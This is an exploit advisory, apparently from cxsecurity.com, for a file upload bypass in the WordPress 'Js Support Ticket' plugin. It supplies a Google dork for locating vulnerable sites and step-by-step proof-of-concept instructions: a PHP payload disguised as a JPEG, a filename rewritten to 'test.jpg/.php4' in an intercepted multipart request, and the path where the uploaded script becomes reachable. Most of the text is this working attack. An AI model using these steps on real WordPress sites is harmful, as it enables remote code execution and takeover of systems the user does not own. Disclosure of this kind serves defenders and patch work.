Wordpress "Js Support Ticket" File Upload Bypass Extensions

2015.12.05
Credit: Mgm-Eg
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:/js-support-ticket-controlpanel/

# Exploit Title: [Wordpress "Js Support Ticket" File Upload Bypass Extensions] # Google Dork: [inurl:/js-support-ticket-controlpanel/] # Date: [3-12-2015] # Exploit Author: [Mgm-Eg] # Vendor Homepage: [http://joomsky.com/products/js-supprot-ticket-wp.html] # Version: [1.X.X] # Contact: [https://ask.fm/m1g1m] --------------- 1- Description | --------------- When you open ticket you can upload Attachments only File Extension Type (doc,docx,odt,pdf,txt,png,jpeg,jpg) but you can bypass it and upload another extensions . -------------------------------------- 2- |Proof of Concept| -------------------------------------- Use Notepad++ open new file , Add [ GIF89a; <?php phpinfo(); ?> #you can replace this code to your code ] " save file as test.jpg " Open ticket page and Complete the required fields , and upload your [test.jpg] Use Http Live Header , Open the request and edit file name from "test.jpg" to "test.jpg/.php4" and delete "GIF89a;" example : -----------------------------319722301512393rn Content-Disposition: form-data; name="filename[]"; filename="test.jpg/.php4"rn Content-Type: image/jpegrn rn rn <?php phpinfo(); ?>rn -----------------------------319722301512393rn #File will be visible: http://wordpress_site/wp-content/plugins/js-support-ticket/jssupportticketdata/attachmentdata/ticket/ticket_yourid/yourfile.php #also check your email to know your path file , or open my tickets to see all tickets you have sent to know your path file .


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top